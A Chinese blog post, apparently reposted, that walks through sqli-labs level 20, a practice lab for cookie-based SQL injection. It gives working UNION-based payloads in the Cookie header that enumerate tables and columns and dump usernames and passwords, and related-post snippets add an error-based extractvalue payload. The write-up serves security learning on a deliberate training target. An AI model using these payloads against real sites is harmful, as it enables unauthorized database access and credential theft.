sqli-labs(20)

最新推荐文章于 2024-05-18 16:15:21 发布
最新推荐文章于 2024-05-18 16:15:21 发布
阅读量112 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/-zhong/p/10929299.html
版权

0X01

试探一下 这是登录成功的页面

这里题目高速我们是基于cookie的注入

0X01抓包试探

这里登陆的时候有两个包

我们要含有cookie的那个包

0X02试探判断是否cookie存在注入

Cookie: uname=admin'

 

 报错 那么应该是基于'的cookie注入 我们现在找到了 是cookie的注入 并且是’闭合 那么我们如何进行注入呐?

怎么知道原来的语句呐?这里有一点点思路了 构造后面一个数据一个数据的加 加在,后面

Cookie: uname=admin',1)#
Cookie: uname=admin',1,1)#
Cookie: uname=admin',1,1,1)#

似乎好像不行 那cookie是如何和数据库进行交互的呐?

看了源码 原来如此

你登录成功 就会在数据库存放cookiee的变量

然后以下每一次提交

 

 那我们第一次cookie正确提交 后面直接构造语句进行

 

 这里查询cookie的语句是* 但是我们知道secruity这个里面有3个表 所以这里我们构造语句

Cookie: uname=1'  union select 1,2,database()#

这里不能填入你正确的cookie 如果你填入真确的那么他就不会显示出你后面语句要查询的结果 name 和password都会显示成你正确的、

所以这里我们要填错误的cookie来进行注入

0X02爆表名 限制了输出长度 这里用limit 绕过

Cookie: uname=ad'  union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 3,1)#

 

0X03组合拳打法

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

字段

1' union select 1,2,group_concat(concat_ws('-',id,username,password)) from users#

 

切记 学习之路 少就是多 慢就是快

转载于:https://www.cnblogs.com/-zhong/p/10929299.html

sqli-labs第二十关详解
m0_67391521的博客
05-15 587
目录 源码分析 setcookie函数分析 header函数分析 ?注入点查找 DNSlog注入 爆数据库 爆表 爆字段 爆值 源码分析 看了下源码,跟上一关差别挺大的,先看下不懂的函数 setcookie函数分析 setcookie(),简单来说就是网站给了一个cookie你,下次访问的时候就能直接在http中带上这个cookie,保留上次访问的记录 而源码里第一个出现的setcookie的意思就是 给客户端发送一个名为uname的cookie,uname值设置为$cookee的值,360
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs(20
jimggg的博客
03-20 283
Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)
Sqlilabs-20
KAKA的博客
07-09 624
十大关一关卡,小试牛刀来到了第 20 关: 本关还是在 HTTP HEADRE 做文章,具体为 COOKIE 先输入正确的用户名和密码,进入界面看看: 通过观察我们可以看到具体的 payload 该如何构造 把 hackbar 的 cookie 栏调出来: –查表 uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=databas
sqli-labs 20
devilare的博客
01-27 629
sqli-labs 20 cookie 注入 来到20题,基础注入的最后一题了,加油!!! 嗯。。。看不懂,但是多了一个cookie,想来应该与cookie有关,基于前几关的经验,抓个包看看 发现网页显示跟抓包显示不一样了。。。回到proxy页面发现有另一个网页,分析这次一样了,而且cookie处变为了admin,有猫腻,看看源码后得知没有检查cookie,应该可以cookie注入 尝试 没有问题,是单引号闭合,开始尝试注入 接下来就是常规操作了okk。 ...
sqli-labs第二十关
m0_73248913的博客
02-16 505
sqlilabs第二十关cookie注入
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs-maste 靶场的下载, phpStudy 下载
最新发布
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
SQLi Labs Lesson20
1ame的博客
08-16 338
Lesson - 20 POST - Cookie Injection - Uagent field - error based 该网页大概框架如下: if(!isset($_COOKIE['uname'])) { //声明实现过滤函数check_input function check_input($value) { ......
sqli-labs关卡20(基于http头部报错盲注)通关思路
zyh1588的博客
11-18 1130
小白回顾sql靶场第二十关
SQLilabs的第20关(HTTP请求头-Cookie)——报错注入
qq_73393033的博客
07-23 745
我们在判断闭合方式时发现,该网站会返回报错信息,又没有回显,因此适合使用报错注入。我们在cookie的后面加上一个',返回;这说明闭合方式是'。
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 986
SQL-cookie注入】
sqli-lubs全20关(图文)
rui__rui__的博客
01-18 4969
SQLI-LABS注入前20关(学自B站crow大佬)
sqli-labs靶场第二十关
gou1791241251的博客
12-30 1205
根据提示,二十关是cookie注入。我们输入单引号和双引号进行测试 发现它报错了,说明应该是单引号闭合的 尝试一下构建报错注入。 此处的报错信息中查询到了数据库版本,同理可以查询所有库,所有表名,所有字段名等信息。 ...
sqli-labs解题大法18~20
weixin_43733035的博客
01-22 925
Less-18: 这一关看过源码后发现username和password都进行了check_input,然后瞬间迷茫了,两个输入的地方都没办法进行注入了啊。后来看了下源码,发现了一个insert 这里可以用burp_suite来进行抓包修改,软件安装参考 [burp的安装]:(https://blog.csdn.net/weixin_43733035/article/details/8659354...
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2281
本文章主要是关于sqli-labs靶场1-20关的通关方法
支持PHP7的sqli-labs靶场介绍
文件名称'sqli_labs_sqli-version-master'暗示这是一个包含了多种版本的SQL注入实验室,其中'sqli-version'可能指代不同阶段或难度级别的SQL注入练习,而'master'可能表示这是一个主版本或完整版本的文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值